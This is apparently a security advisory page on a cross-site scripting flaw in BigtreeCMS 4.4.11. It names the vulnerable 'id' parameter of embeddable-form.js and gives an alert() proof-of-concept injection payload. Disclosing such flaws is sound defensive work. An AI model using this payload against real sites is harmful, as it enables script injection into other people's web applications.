BigtreeCMS 4.4.11 Cross Site Scripting

2020.12.10

Credit: Daniel Bishtawi

Risk: Low

Local: No

Remote: Yes

CVE: CVE-2020-995566

CWE: CWE-79

Information
--------------------

Advisory by Netsparker
Name: Cross-Site Scripting Vulnerability in BigtreeCMS
Affected Software: BigtreeCMS
Affected Versions: 4.4.11
Vendor Homepage: https://www.bigtreecms.org/
Vulnerability Type: Cross-Site Scripting
Severity: Important
Status: Fixed
CVE-ID: CVE-2020-995566
CVSS Score (3.0): 7.4 (High)
Netsparker Advisory Reference: NS-20-004

Technical Details
--------------------

URL: http://mylocalhost/site/index.php/admin/js/embeddable-form.js?hash=&id=
'"--></style></scRipt><scRipt>alert(0x00E4E5)</scRipt>
Parameter Name: id
Parameter Type: GET
Attack Pattern:    '"--></style></scRipt><scRipt>alert(2)</scRipt

Note: This vulnerability is reproducible at Internet Explorer due to mime
type sniffing.

For more information on cross-site scripting vulnerabilities read the
article Cross-site Scripting (XSS).

For more information:
https://www.netsparker.com/web-applications-advisories/ns-20-004-cross-site-scripting-in-bigtreecms/

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

BigtreeCMS 4.4.11 Cross Site Scripting

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

BigtreeCMS 4.4.11 Cross Site Scripting

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.